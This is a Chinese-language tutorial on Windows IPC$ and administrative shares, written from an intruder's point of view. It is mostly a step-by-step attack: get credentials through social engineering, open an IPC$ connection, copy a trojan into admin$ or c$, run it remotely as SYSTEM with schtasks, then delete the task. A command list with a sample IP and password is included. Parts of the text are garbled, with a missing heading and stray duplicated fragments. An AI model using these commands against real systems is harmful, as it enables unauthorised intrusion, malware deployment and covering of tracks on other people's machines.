1.关于Windows操作系统中的“共享”
在Windows操作系统中的共享有3类:普通共享、默认共享、IPC$共享,
-
普通共享:就是通常意义上的共享,即用户设置的共享目录、共享文件夹、共享分区等; -
默认共享:Windows操作系统的隐含驱动器共享,通常有: (1)驱动器共享:如C$ 、D$ ,开启后可直接访问分区中资源; (2)系统管理共享admin$ :通常指向C:\Windows 。 -
IPC$ 共享:这实际不是共享,而是提供一种访问管道;IPC全称“Internet Process Connection”,顾名思义,是为了进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
查看服务器所开放的共享,可使用命令:net share
2. 利用条件
- 开放了139、445端口;
- 目标开启
ipc$ 文件共享; - 获取用户账号密码。
3.IPC连接建立与攻击尝试
- 首先,目标服务器上必须启用了
IPC$ ,启用命令: net share IPC$ 当然,目标服务器上启用的共享对入侵者而言,多多益善。
P.S. 删除IPC$ 命令:net share IPC$ /del
- 在入侵者侧,首先须建立与目标服务的IPC管道连接,建立连接命令如下:
net use \\目标服务器IP地址\IPC$ "口令" /user:用户名
P.S. 如口令、用户名为空,则建立了所谓“空连接”,这种连接权限有限,仅为everyone级权限;因此,建议在通过社会工程等手段获取用户、口令后再尝试。
-
建立连接后,用net share \\目标服务器IP地址 查看目标服务器所开放的共享资源,也可以直接尝试上传或访问某个共享(例如:admin$ )、确认是否有可以利用的资源或信息; -
尝试攻击:将木马或其他工具上传至目标服务器的共享目录,比如:
copy 工具.exe \\目标服务器\admin$
然后直接或定时(利用at命令)运行工具.exe,完成攻击。接建立与攻击尝试
net time \\193.168.1.12
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
5.常用命令
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
net use
net view \\193.168.1.12
net time \\193.168.1.12
nbtstat -A 193.168.1.12
net use \\193.168.1.12\ipc$ /del
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe
(上传到目标的:c\windows\temp\目录下)
copy \\127.0.0.1\c$\test.exe c:\
(下载到本地c盘下)
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
|